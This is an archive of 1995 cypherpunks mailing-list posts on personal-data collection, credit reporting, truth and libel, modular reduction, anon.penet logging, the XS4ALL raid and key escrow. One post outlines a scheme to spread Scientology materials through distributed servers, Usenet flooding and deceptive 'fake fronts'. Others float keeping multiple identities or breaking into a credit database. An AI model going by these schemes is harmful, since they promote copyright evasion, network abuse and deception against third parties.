Subject: Re: Collection of personal info
In-Reply-To: <Pine.BSI.3.91.950906221202.20079C-100000@usis.com>
Message-ID: <Pine.LNX.3.91.950906210405.19265B-100000@on-ramp.ior.com>
MIME-Version: 1.0
Content-Type: text/plain



> Nor was I suggesting a legal solution (I know your comment
> was triggered by Rob's request for legal recourse) but instead
> suggesting that things are farther along than some people realize.

Nor do I support additional rules/laws or regulations.. but if there are 
existing ones to screw with, use 'em..
Recently I had a bill turned over to collections from, of all places, the 
daycare we used to take our kids too.. we owe them about $1300 in their 
estimation. The reason we have not paid is due to 11 days of lost work 
due to head lice that they provided to my kids, plus they stopped serving 
breakfast which was in the contract we signed when enrolling the kids there..
I was notified by the collection co. about this submittal (now $1500 for 
some reason..) and by law, I can dispute this in writing, thus slowing 
the wheels of the collection monster horribly. I did so.. and for the 
last 4 months, they have been trying to prove I owe money.. I was asking 
if such a system exist for the release of your credit info.. and it 
appears that there is no safety mechanism in that monster.  Rather than 
cry out for more laws to be twisted against us later, I agree that 
letting it happen, and using cash instead of credit, is the smart answer 
here.

Someone care to point me at e-cash info? sounds interesting.. remember, 
I am new to the crypto scene and still think PGP is neato ;)






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: damion.furi@the-matrix.com (DAMION FURI)
Date: Wed, 6 Sep 95 19:52:01 PDT
To: cypherpunks@toad.com
Subject: Collection of persona
In-Reply-To: <8B09393.000504D43B.uuout@the-matrix.com>
Message-ID: <8B094FC.000504D58B.uuout@the-matrix.com>
MIME-Version: 1.0
Content-Type: text/plain



RL|Beyond having the willies.. This is more than just scary, it feels like
  |rape when you think about it for awhile. Everything you buy, on credit, is
  |recorded and sold to someone who wants to know your secrets. Everytime
  |you make a banking transaction, someone is watching and compiling the
  |data.

        It's not just credit anymore.  If you buy something at Radio
        Shack, even with cash, they want you to give all your info
        voluntarily and they _will_ give you flack if you don't
        cooperate (which can be short-circuited by threatening to cause
        a scene or by suggesting loudly that <competitor> has lower
        prices).

        Anyway, most of what you're wanting to protect aren't secrets,
        at least in the sense of being sensitive material.  It's our
        privacy, our solitude, and our peace of mind that's under
        attack.

RL|Is there any legal recourse to get your name removed from the sellable list?
  |Or is it too late and we can not save even the vestiges of our privacy?

        There's a place in D.C. you can write to that will put a block
        on some lists, but not all (I don't have the address anymore).
        We're screwed.

RL|Oh, but if only I had the 'hacker' skill to break into such a database..
  |I have always been against the destruction of data.. but there are
  |exceptions...

        It wouldn't help and you would be jailed for nothing.


   :----------:----------:----------:----------:----------:----------:-----
   : furi@the-matrix.com |   pgp-public-key@demon.co.uk   | LIVE LION ALERT
   : 2.6.2 1024/C1225CE1 | 38 11 7C 59 FB F3 7C C0  F7 E9 67 1F AF B8 2D 94
                 PGP: When it's none of their damned business.

 -- SPEED 1.40 [NR]: Evaluation day 133...




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mac Norton <mnorton@cavern.uark.edu>
Date: Wed, 6 Sep 95 19:20:50 PDT
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: Collection of personal info
In-Reply-To: <ac73a1e41f0210048666@[205.199.118.202]>
Message-ID: <Pine.SOL.3.91.950906211454.8489Q-100000@cavern>
MIME-Version: 1.0
Content-Type: text/plain




On Wed, 6 Sep 1995, Timothy C. May wrote:
> I don't really disagree with Mac, at least practically speaking.
> 
> (At a much deeper level, much deeper in terms of philosophy, I'm not even
> sure _disseminators_ of information have any real necessity to be correct.
> This is the issue of truth, reputation, etc. that we discuss so often. But,
> I admit that the legal system does not support my anarcho-capitalist
> extreme position, which is why I say I don't disagree with Mac,
> "practically speaking.")

Well, scratch me deeply enough, I'm not sure I'd disagree 
with Tim, "philosophically speaking."  The problem is, as
all the truly wise philosophers recognized, we must live
in the world.  And given the number of us who must do so,
that entails rules.

With that caveat, none of the below is insufferable to me. 

MacN

> However, even if I were to start distributing the results of "Tim's
> BlackNet Dossier Service," I don't think there's any justification for
> people insisting that they have a right to "inspect" my records.
> 
> I think the current U.S. law is not too far from my own views. The credit
> reporting agencies have an obvious interest in having accurate
> information--except for the folks in the Witness program--and will
> eventually correct errors. (Not everyone is happy with the speed, but this
> is life in a world of finite resources; and I acknowledge that there are
> pathological cases of incorrect identity, etc.)
> 
> I still favor free market alternatives to top-down government "protection."
> 
> And, lest anyone think I'm lapsing in my basic beliefs, I lean toward
> throwing out _all_ laws about libel, slander, and false information. After
> all, "what is truth?," to coin a phrase.
> 
> --Tim May
> 
> 
> ---------:---------:---------:---------:---------:---------:---------:----
> Timothy C. May              | Crypto Anarchy: encryption, digital money,
> tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
> Corralitos, CA              | knowledge, reputations, information markets,
> Higher Power: 2^756839      | black markets, collapse of governments.
> "National borders are just speed bumps on the information superhighway."
> 
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Wed, 6 Sep 95 19:21:55 PDT
To: tcmay@got.net (Timothy C. May)
Subject: Re: Collection of personal info
In-Reply-To: <ac73a1e41f0210048666@[205.199.118.202]>
Message-ID: <199509070227.VAA00478@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



> 
> And, lest anyone think I'm lapsing in my basic beliefs, I lean toward
> throwing out _all_ laws about libel, slander, and false information. After
> all, "what is truth?," to coin a phrase.
> 
> --Tim May
> 

Truth is that which can be verified to be reproducable by indipendant and
unbiased parties. All else is opinion.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: damion.furi@the-matrix.com (DAMION FURI)
Date: Wed, 6 Sep 95 20:59:29 PDT
To: cypherpunks@toad.com
Subject: Collection of persona
In-Reply-To: <8B094A8.000504D4D8.uuout@the-matrix.com>
Message-ID: <8B0951B.000504D5AC.uuout@the-matrix.com>
MIME-Version: 1.0
Content-Type: text/plain



BU|In fact it's not difficult.  It's quite simple to estlablish new identity
  |for the individual willing to risk the charges and consequences of
  |exposure.  The basic impediment is time.  Good credit doesn't come
  |overnight.  The second impediment is tax evasion- which is less than
  |justifiable in the United States on the grounds of privacy.  If you're
  |willing to be patient, and pay taxes on more than one name, its easy to
  |maintain several identities.

        A lot of "ifs" there.  Not to mention the expense.

BU|> If it were possible to have an alias in real
  |> life, as easy as it is to get one on the 'net that is, then I would most
  |> certainly do so..
BU|Which tells me how serious you really are about your privacy.  You have
  |made a decision here about how much trouble privacy is worth to you,
  |which is "not much."

        And how many "real names" do you have off the net?

BU|I hear people bitch about privacy endlessly.  Privacy helps those who
  |help themselves to privacy.  I think Mr. May was precisely correct in saying
  |that it is so much easier and simpler for one to rely on self privacy
  |insurance rather than government privacy insurance.

        Certainly.  That doesn't mean that we're all going to jump
        up and maintain several aliases.  Particularly when our
        beloved Uncle Sam is quite capable of deciding that it's
        for fraudulent purposes -- which makes it a felony.

        It would be simpler and easier to start another revolutionary
        war than follow your logic.


   :----------:----------:----------:----------:----------:----------:-----
   : furi@the-matrix.com |   pgp-public-key@demon.co.uk   | LIVE LION ALERT
   : 2.6.2 1024/C1225CE1 | 38 11 7C 59 FB F3 7C C0  F7 E9 67 1F AF B8 2D 94
                 PGP: When it's none of their damned business.

 -- SPEED 1.40 [NR]: Evaluation day 133...




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Froomkin <mfroomki@umiami.ir.miami.edu>
Date: Wed, 6 Sep 95 18:56:28 PDT
To: cypherpunks <cypherpunks@toad.com>
Subject: Re: Collection of personal info
In-Reply-To: <ac73977f1d0210041506@[205.199.118.202]>
Message-ID: <Pine.PMDF.3.91.950906215435.541116873B-100000@umiami.ir.miami.edu>
MIME-Version: 1.0
Content-Type: text/plain


As it happens I seem to be about to write about this stuff.  Pointers to 
articles/data especially about distributed data sets and how people may 
link them up, would be very welcome...

A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
Associate Professor of Law | mfroomki@umiami.ir.miami.edu
U. Miami School of Law     | 
P.O. Box 248087            | It's hot here.  And humid.
Coral Gables, FL 33124 USA |
See (experimentally & erratically) http://viper.law.miami.edu/~mfroomki





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Cromwell <rjc@clark.net>
Date: Wed, 6 Sep 95 18:58:17 PDT
To: weidai@eskimo.com (Wei Dai)
Subject: Re: fast modular reduction
In-Reply-To: <Pine.SUN.3.91.950906174500.9460B-100000@eskimo.com>
Message-ID: <199509070157.VAA16973@clark.net>
MIME-Version: 1.0
Content-Type: text/plain


> 
> In the following pseudocode, B is the radix in which the numbers are 
> represented (2^32 for a 32-bit machine), n is the length of modulus in 
> blocks, U is B^(n+1) mod the modulus, X is the number to be reduced, k+1 
> is the length of X, and Y is the result.
> 
> 1. Y = X
> 2. For i from k down to n+1, repeat steps 3 and 4
> 3.	Y = Y - Y[i] * B^i + Y[i] * U * B^(i-n-1)
> 4.	If Y >= B^i, then Y = Y - B^i + U * B^(i-n-1)

  Is there a proof of correctness available for this algorithm? It
looks almost like a Radix-B peasant division algorithm with some
modifications. Is there an algorithmic analysis available? I also
I think there is a bug in your description. Let k+1 = n+1
(e.g. the dividend is 1 more "block" than the modulus). Then
i=n starting out, and we have

3. Y=Y - Y[n] * B^n + Y[n] * U * B^(n-n-1)  [we have B^-1] I'm assuming
this was unintended.


How does this algorithm compare to computing the reciprocal
via Newton's Formula, and then multiplying by the reciprocal
using Karatsuba multiplication? While I was at IBM Watson I invented
a modular reduction algorithm that saves 1/4 the number of 
multiplications required on average once you have the reciprocal 
computed.


-Ray


 
 

 



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Charles Gimon" <gimonca@mirage.skypoint.com>
Date: Wed, 6 Sep 95 20:01:08 PDT
To: cypherpunks@toad.com
Subject: University logging mail to anon.penet (fwd)
Message-ID: <m0sqXCA-0005FXC@skypoint.com>
MIME-Version: 1.0
Content-Type: text/plain


Forwarded message:
> From toad.com!owner-cypherpunks Wed Sep  6 21:43:41 1995
> From: Jeff Simmons <jsimmons@goblin.punk.net>
> Subject: University logging mail to anon.penet
> 
> This just came up locally, and I'd like to have some comments on it, 
> especially from people who understand the law a lot better than I do:
> 
> Our local University apparently has been logging ALL mail to anon.penet,
> including faculty, students, and off-campus users.
> 
> They maintain such weak security that someone was able to "obtain"
> the logs and post them to a local usenet group, thus compromising
> everyone's "anonymous" identities.
> 

punk.net is in San Luis Obispo. Since Skypoint carries a lot of 
regional groups, I can follow the issue on Usenet, in these
groups:

slo.unix,slo.general,slo.punks,alt.comp.acad-freedom.talk,comp
.org.eff.talk

Those of you who don't get the slo.* groups, you can probably see
the original posts in comp.org.eff.talk or alt.comp.acad-freedom.

The subject is "No subject".

(I still chuckle when I see the group slo.sex ...)



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Cromwell <rjc@clark.net>
Date: Wed, 6 Sep 95 19:05:44 PDT
To: cman@communities.com (Douglas Barnes)
Subject: Re: fast modular reduction
In-Reply-To: <v02120d11ac7406fa32d1@[199.2.22.120]>
Message-ID: <199509070205.WAA18771@clark.net>
MIME-Version: 1.0
Content-Type: text/plain


> 
> 
> I was very distressed when Josh gave this presentation; apparently
> patents have been filed, etc., and someone from another company
> in Europe was claiming they'd _already_ patented it.
> 
> What is the story here? From my pov, the performance increase doesn't
> justify the ramifications of dealing with yet another potentially
> surly patent holder (either Microsoft in your case, or whoever the
> irate European fellow was who claims to have already patented it.)

  I wish the damn patent offices of the world would get a clue. It used
to be when someone found a quicker algorithm, it was published in
a journal and sooner or later showed up in Knuth AoCP version x.y. Now,
every single algorithm gets patented. At the rate its going now,
"ComponentWare" of the future will mean the number of patent components
you managed to license simultaneously. The worst patent being
considered by the Patent Office right now is the dreaded Eolas patent
which purports to have invented the concept of "embedded applications"
in Web documents (e.g. Grail, Java, Safe-Tcl) and interprocess
communication between web browsers and helper applications
(e.g. NS-API/NC-API)

  The whole patent system needs to be abolished.

-Ray






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cg@bofh.lake.de (Cees de Groot)
Date: Wed, 6 Sep 95 13:29:12 PDT
To: cypherpunks@toad.com
Subject: Re: Scientology and police visit XS4ALL Amsterdam
Message-ID: <m0sqR1Y-000Pa2C@bofh.lake.de>
MIME-Version: 1.0
Content-Type: text/plain


> 
>      This is the second or third time I've seen descriptions of such
>      raids where cult (no, I'm not trying to be diplomatic)
>      representatives were present and participating.  Is this legal in
>      Amsterdam?  How about in the U.S.?  Britain?
> 
Probably. Amsterdam isn't exactly the wild west, and they didn't take the
computer equipment with them, they just inventoried everything so to have
something to sell when their claims prove valid. Which I doubt (shit, I
will be moving to this country in a couple of weeks...)

>      If a police officer has a warrant then I really don't have much
>      choice about letting him in.  Am I also under an obligation to
>      allow the people who filed for the warrant into my home or
>      business?
> 
I don't know whether this is valid. I assume so. I also think it is about
time we develop some ideas about anonymous web publishing. Probably some
chained cgi scripts could do, but how to get around traffic analysis?

-- 
Cees de Groot, OpenLink Software		         <cg@bofh.lake.de>
262ui/2048: ID=4F018825 FP=5653C0DDECE4359D FFDDB8F7A7970789 [Key on servers]
http://www.lake.de/sonst/homepages/s2449/index.html



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Neal <dneal@usis.com>
Date: Wed, 6 Sep 95 20:35:35 PDT
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: Collection of personal info
In-Reply-To: <ac737a2b1b0210043115@[205.199.118.202]>
Message-ID: <Pine.BSI.3.91.950906221202.20079C-100000@usis.com>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 6 Sep 1995, Timothy C. May wrote:

> At 10:15 PM 9/6/95, Rob Lowry wrote:
> 
> >Beyond having the willies.. This is more than just scary, it feels like
> >rape when you think about it for awhile. Everything you buy, on credit, is
> >recorded and sold to someone who wants to know your secrets. Everytime
> >you make a banking transaction, someone is watching and compiling the
> >data.
> >
> 
> If someone doesn't want their postings going into my 220 megabyte file of
> postings, they shouldn't send them to me. Or they should adopt a digital
> pseudonym, unlinkable to their True Name or any other nyms they may have.
> 
> Things are much simpler and less stressful when you don't look to the law
> to fix things.
> 

Nor was I suggesting a legal solution (I know your comment
was triggered by Rob's request for legal recourse) but instead
suggesting that things are farther along than some people realize.

Someone suggested a rational, non-hysterical approach to
converting people.  Perhaps.  I certainly wrote a nice letter
to the editor of a magazine which published a piece about
electronic checking, and made sure to mention that e-cash
would be preferable to some.  

On the other hand, The Gub'mint is certainly conducting a
campaign overt and covert to throttle unlimited and uncontrolled
use of cryptography.  That combined with how politicized
things are these days, it can be difficult to conduct a rational
debate or in fact find anyone who wants to talk. 

Personally, I'm of the opinion that we need to a pre-emptive
crypto strike.  But just as the 'Privacy Card' has been debated
here endlessly, so too reaching critical market mass w/a 
'bump in the cord' product.



David Neal <dneal@usis.com> - GNU Planet Aerospace 1-800-PLN-8-GNU
Unix, Sybase and Networking consultant. "...you have a personal responsibility 
to be pro-active in the defense of your own civil liberties." - S. McCandlish





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mac Norton <mnorton@cavern.uark.edu>
Date: Wed, 6 Sep 95 20:33:36 PDT
To: Jim Choate <ravage@einstein.ssz.com>
Subject: Re: Collection of personal info
In-Reply-To: <199509070227.VAA00478@einstein.ssz.com>
Message-ID: <Pine.SOL.3.91.950906223208.12556D-100000@cavern>
MIME-Version: 1.0
Content-Type: text/plain


Doesn't make it true, in Tim's sense--just makes it verifiable.

MacN

On Wed, 6 Sep 1995, Jim Choate wrote:
> Truth is that which can be verified to be reproducable by indipendant and
> unbiased parties. All else is opinion.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: msprague@owens.ridgecrest.ca.us (M. F. (Pat) Sprague)
Date: Wed, 6 Sep 95 22:54:30 PDT
To: cypherpunks@toad.com
Subject: Diskreet Disk Help Needed
Message-ID: <199509070555.WAA11056@owens.ridgecrest.ca.us>
MIME-Version: 1.0
Content-Type: text/plain


One of my Diskreet Disks has refused to open but will change size and password.  Any suggestions??





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: gjeffers@socketis.net (Gary Jeffers)
Date: Wed, 6 Sep 95 20:44:26 PDT
To: cypherpunks@toad.com
Subject: ON  OFF-TOPIC
Message-ID: <199509070639.BAA00416@mail.socketis.net>
MIME-Version: 1.0
Content-Type: text/plain


                    ON  OFF-TOPIC

     THE UNITED STATES "FEDERAL" GOVERNMENT HAS NO LEGITIMACY!


       CRYPTO CODERS SUPPLY THE MEANS!
CONSPIRACY THEORISTS SUPPLY THE MOTIVATION!


conspiracy theorist = alternative political theorist
NOT= AP/ABC/CBS/NBC/CIA/FBI/U.S GOV'N./New York Times/Washington Post
opinion moulders syndicate

"extremist right-wing kook" = old fashioned American patriot
Left term used often by left-wing extremist liberal statist kooks.

The United States "Federal" Government - we'll be even more American
without it.



                                              PUSH EM BACK! PUSH EM BACK!
                                              WWWAAAYYYY  BBBAAACCCK!
                                              BBBEEEAAATTTT  STATE!






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Wed, 6 Sep 95 22:46:01 PDT
To: cypherpunks@toad.com
Subject: What is truth?
Message-ID: <ac73d35421021004239f@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 5:07 AM 9/7/95, Jim Choate wrote:
>>
>> Doesn't make it true, in Tim's sense--just makes it verifiable.
>>
>> MacN
>>
>> On Wed, 6 Sep 1995, Jim Choate wrote:
>> > Truth is that which can be verified to be reproducable by indipendant and
>> > unbiased parties. All else is opinion.
>>
>
>What exactly is Tim's sense to you? Perhaps Tim could clarify more clearly
>what he means by 'truth'.  To me it sounds like he is saying that there is
>some viewpoint that is absolute. I no more believe in absolute viewpoints
>than I believe in absolute coordinates.

I promise to be mercifully brief. This is a subject that we could all go on
and on about. I used the ironic "What is truth?," a la Pilate, to indicate
some degree of ambiguity. How Jim concluded that I have some absolutist
viewpoint from this simple line is unclear to me.

In any case, I don't believe there are "independent and ubiased parties"
who can determine what truth is. Not that there is no measure of truth. I
am no solipsist, and I believe we have a much clearer view today of how
things work than we had, say, 500 years ago. Courtesy of science and the
core idea of falsifiability.

As this view relates to government and law, it is that many things are best
left outside the bounds of the law. The law stays out of most inter-family
disputes, for example, unless violence or fraud of a major sort occurs.

And the law stays out of confirming or refuting religious claims. If
Preacher Bob says that praying to Baal will save one's soul, no law officer
will step in and stop this "lie." As I like to put it, of the N different
religions, at most _one_ of them is "true," and the other N - 1 are based
on lies. So, if we are to "allow" religious freedom we must surely allow
lies to be told. Q.E.D.

Our liberal, Western society went through this debate a long time ago, and
it was pretty much concluded that people could choose their own paths to
hell without interference from others. That people were free to believe any
damned fool idea they wanted to believe in.

Somewhere along the line we've adopted the new view that government needs
to correct all incorrect thoughts, needs to protect people from "hurtful"
ideas and speech, and needs to determine what is true and what is not true.

If you want more information on my views about truth, check out the work on
"evolutionary epistemology," especially the writings of William Bartley and
Karl Popper.


--Tim May


---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Robert A. Hayden" <hayden@krypton.mankato.msus.edu>
Date: Wed, 6 Sep 95 21:02:31 PDT
To: Jeff Simmons <jsimmons@goblin.punk.net>
Subject: Re: University logging mail to anon.penet
In-Reply-To: <199509070230.TAA24609@goblin.punk.net>
Message-ID: <Pine.ULT.3.91.950906230159.23134A-100000@krypton.mankato.msus.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Wed, 6 Sep 1995, Jeff Simmons wrote:

> This just came up locally, and I'd like to have some comments on it, 
> especially from people who understand the law a lot better than I do:
> 
> Our local University apparently has been logging ALL mail to anon.penet,
> including faculty, students, and off-campus users.
> 
> They maintain such weak security that someone was able to "obtain"
> the logs and post them to a local usenet group, thus compromising
> everyone's "anonymous" identities.

I'd say that there are some serious ethical and legal concerns that 
should be addressed by the administration for keeping such logs...


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: PGP Signed with PineSign 2.2

iQCVAwUBME5SwjokqlyVGmCFAQGuLQP/TA9F2Vf65o37Yq821zFfBB8HNekfdB6I
PcmaRPHFzlgGfV2iSQm4sn0KHLddpX70ZrUaGM2uuJsYC1iwPagGOQR0Y51tjU7Y
1O+jBf3Pjsa64rox1Y5+7fQAnl4hD5Io13MtsosDC19kjPYuoJ33RHWF/uiHRT5N
stRLLxwWjEo=
=MQuw
-----END PGP SIGNATURE-----
 
____           Robert A. Hayden      <=> hayden@krypton.mankato.msus.edu
\  /__     Finger for Geek Code Info <=>    Finger for PGP Public Key
 \/  /           -=-=-=-=-=-                      -=-=-=-=-=-
   \/        http://krypton.mankato.msus.edu/~hayden/Welcome.html

-----BEGIN GEEK CODE BLOCK-----
Version: 3.1
GED/J d-- s:++>: a-- C++(++++)$ ULUO++ P+>+++ L++ !E---- W+(---) N+++ o+
K+++ w+(---) O- M+$>++ V-- PS++(+++)>$ PE++(+)>$ Y++ PGP++ t- 5+++ X++
R+++>$ tv+ b+ DI+++ D+++ G+++++>$ e++$>++++ h r-- y++**
------END GEEK CODE BLOCK------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Deranged Mutant <rrothenb@ic.sunysb.edu>
Date: Wed, 6 Sep 95 20:04:38 PDT
To: damion.furi@the-matrix.com
Subject: Re: Collection of personal information etc. etc. etc.
In-Reply-To: <8B094FC.000504D58B.uuout@the-matrix.com>
Message-ID: <199509070305.XAA18310@libws4.ic.sunysb.edu>
MIME-Version: 1.0
Content-Type: text/plain




>         It's not just credit anymore.  If you buy something at Radio
>         Shack, even with cash, they want you to give all your info
>         voluntarily and they _will_ give you flack if you don't
>         cooperate (which can be short-circuited by threatening to cause
>         a scene or by suggesting loudly that <competitor> has lower
>         prices).

Depends on the counter people. The local RS here the clerks don't care
much about it and will enter a random number. A local Service Merchandise
does the same thing, but they're pesky, so I make up silly names to test
the wits of impatient teenage mutant cashiers.  (They also used to have
a computer where you enter your telno. and place orders to pick up at
the desk... I don't think the system bills you automatically but the
employees probably won't like it when you have them get 10 wieght sets
out...)






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Deranged Mutant <rrothenb@ic.sunysb.edu>
Date: Wed, 6 Sep 95 20:05:35 PDT
To: jsimmons@goblin.punk.net (Jeff Simmons)
Subject: Re: University logging mail to anon.penet
In-Reply-To: <199509070230.TAA24609@goblin.punk.net>
Message-ID: <199509070306.XAA18362@libws4.ic.sunysb.edu>
MIME-Version: 1.0
Content-Type: text/plain



So which university is this?

> This just came up locally, and I'd like to have some comments on it, 
> especially from people who understand the law a lot better than I do:
> 
> Our local University apparently has been logging ALL mail to anon.penet,
> including faculty, students, and off-campus users.
> 
> They maintain such weak security that someone was able to "obtain"
> the logs and post them to a local usenet group, thus compromising
> everyone's "anonymous" identities.
> 
> -- 
> Jeff Simmons                           jsimmons@goblin.punk.net
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jaeson.M.Engle@dronf.org (Jaeson Engle)
Date: Wed, 6 Sep 95 21:06:09 PDT
To: cypherpunks@toad.com
Subject: ULC Online
Message-ID: <v02130500ac74211b4db2@[152.97.1.23]>
MIME-Version: 1.0
Content-Type: text/plain


Just in case anyone else wants to go ahead and get ordains in the ULC,

http://ybi.com/ulc/ordain.html

Online form for getting ordained.

Jaeson


--
Jaeson M. Engle                     http://www.dronf.org
            Coordinator of the Jourvian Group
PGP Mail Encouraged ->   jme.pub.key@dronf.org
Project List                     ->        programs@dronf.org






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Wed, 6 Sep 95 23:30:51 PDT
To: Jim Gillogly <jim@rand.org>
Subject: Re: Another Son of Clipper discussion paper
In-Reply-To: <199509052053.NAA01226@mycroft.rand.org>
Message-ID: <199509070612.XAA16340@netcom8.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


                                                                                
J.G. on "proposed escrow techniques":
>In order to help make most productive use of the limited time
>available at the upcoming meeting and to better focus
>deliberation, the following criteria are being distributed for
>discussion purposes.  Since it is important that final criteria
>be clear, straightforward, consistent, and implementable, please
>review these draft criteria and be prepared to discuss
>how they may be refined and made more specific.

could someone explain to me why the passive voice is being used
in this proposal? who is proposing this criteria?

there is a saying "he who appeases an alligator does so in hopes
of being eaten last".

J.G., where did this list of proposal items come from? from you?
are you a private researcher? if so, how do you justify this list?
I mean, I can imagine someone from the NSA coming up with something
this specific and restrictive, but frankly I find it in rather
poor taste for private, unaffiliated researchers trying to
bargain with the NSA. there is a clear-cut right to encryption in
a free society, and anything less is a compromise with totalitarianism
IMHO.

IMHO no genuine self-respecting cypherpunk would be involved in any kind
of discussions involving government key escrow, unless to go as
an agent provocateur. the whole issue lends an "aura of legitimacy"
to an issue that has absolutely none. its like the Perl shirt--
as I have said many times, as long as people argue about the 
precise legality of the code, they are *losing* the battle with the
NSA and playing into their hand and exactly the kind of paranoia
over cryptography use they are trying to cultivate.

--Vlad Nuri




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Cromwell <rjc@clark.net>
Date: Wed, 6 Sep 95 20:46:27 PDT
To: cg@bofh.lake.de
Subject: Re: Scientology and police visit XS4ALL Amsterdam
In-Reply-To: <m0sqR1Y-000Pa2C@bofh.lake.de>
Message-ID: <199509070346.XAA14571@clark.net>
MIME-Version: 1.0
Content-Type: text/plain



Anyone ready to risk running a "Scientology .sig virus server"?


Here's the idea. The CoS apparently freaks out and sues anyone who
distributes CoS material, even those who quote small portions of it.
In the same spirit of the "export-a-sig-PGP" system, why not break
the CoS materials up into n pieces (each piece being 5-10 lines long)
and let people request chunks from a server to put in this .sig?
The assumption is, the Church can't sue everyone (legal funds
being limited). I think I'd do it just to piss them off.

To spread the risk around even more, I'd place the "piece server"
on k different HTTP sites just so they can't raid them all. Even
better would be to use a script on one master server to
dynamically return HTTP redirects to k different URLs to the real
servers. Another option is dynamic DNS.

Finally, you could have the server run thru email via a chained
anonymous return block. The result would be sent back thru
a remailer chain.

The nastiest thing I can think of is to get the CancelBot people to
let a massive broadcast of CoS materials be sent to UseNet. Other
options include servers which detect known CoS source addresses
and provide "fake fronts" to them. (easily doable with CGI/CERN server
and IDENT).

Cypherpunks oughta be able to figure out something to show those idiots
why their actions are ultimately futile.

-Ray


 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@polaris.mindport.net>
Date: Wed, 6 Sep 95 20:52:21 PDT
To: Jeff Simmons <jsimmons@goblin.punk.net>
Subject: Re: University logging mail to anon.penet
In-Reply-To: <199509070230.TAA24609@goblin.punk.net>
Message-ID: <Pine.SUN.3.91.950906235249.14145B-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain




On Wed, 6 Sep 1995, Jeff Simmons wrote:

> This just came up locally, and I'd like to have some comments on it, 
> especially from people who understand the law a lot better than I do:
> 
> Our local University apparently has been logging ALL mail to anon.penet,
> including faculty, students, and off-campus users.
> 
> They maintain such weak security that someone was able to "obtain"
> the logs and post them to a local usenet group, thus compromising
> everyone's "anonymous" identities.



Which University please?

> 
> -- 
> Jeff Simmons                           jsimmons@goblin.punk.net
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Wed, 6 Sep 95 22:01:44 PDT
To: mnorton@cavern.uark.edu (Mac Norton)
Subject: Re: Collection of personal info
In-Reply-To: <Pine.SOL.3.91.950906223208.12556D-100000@cavern>
Message-ID: <199509070507.AAA01347@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



> 
> Doesn't make it true, in Tim's sense--just makes it verifiable.
> 
> MacN
> 
> On Wed, 6 Sep 1995, Jim Choate wrote:
> > Truth is that which can be verified to be reproducable by indipendant and
> > unbiased parties. All else is opinion.
> 

What exactly is Tim's sense to you? Perhaps Tim could clarify more clearly
what he means by 'truth'.  To me it sounds like he is saying that there is
some viewpoint that is absolute. I no more believe in absolute viewpoints
than I believe in absolute coordinates.

If it is the 'truth' what makes it unverifiable? If I can look at it and
claim it isn't the truth (because I can't verify it) how does one know it
is the truth then? What seperates this unverifiable truth from opinion
(which is equally unverifiable by definition)? What is the litmus test? And
how do we know the litmus test is true? (I see a circle coming up)

For example, lets say that I have a accident with another motorist. We each
tell our story but they are different (or the same for that matter). Which is
true? I would hold neither. The incident as described by either of us is
simply our recollection of happenstance, in other words our opinion of what
occured. It is not what occured. The only truth that could be derived would
be that an accident had occured. Why? Because we would have two bent cars
that anyone who cared enough could verify.

The truth is not some mighty sword we can wield to reveal some shrowded
mystery. It is the realization that the world is a complicated place and we
deal with incomplete facts (ie fog of war). From this meager litany of facts
we try to derive some conclusion that allows us to control our environment.
Truth is a mundane everyday sort of thing, not some magical force. The truth
will not free you nor will it guarantee a better tomorrow.

The whole argument breaks down to the simple question of whether it is
possible to know anything absolutely. If it is possible to know something
absolutely what else to call it but fact (and therefore true)? If it isn't a
fact then it is either a lie (ie the inversion of truth) or else an opinion.
I don't see how there can be any other division than these three.

Another way to look at it is to say that if it involves faith it can't be
truth. Truth can't be dependant on faith (ie observer).

[Looking over this I realize that we are talking about a form of
computability]




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
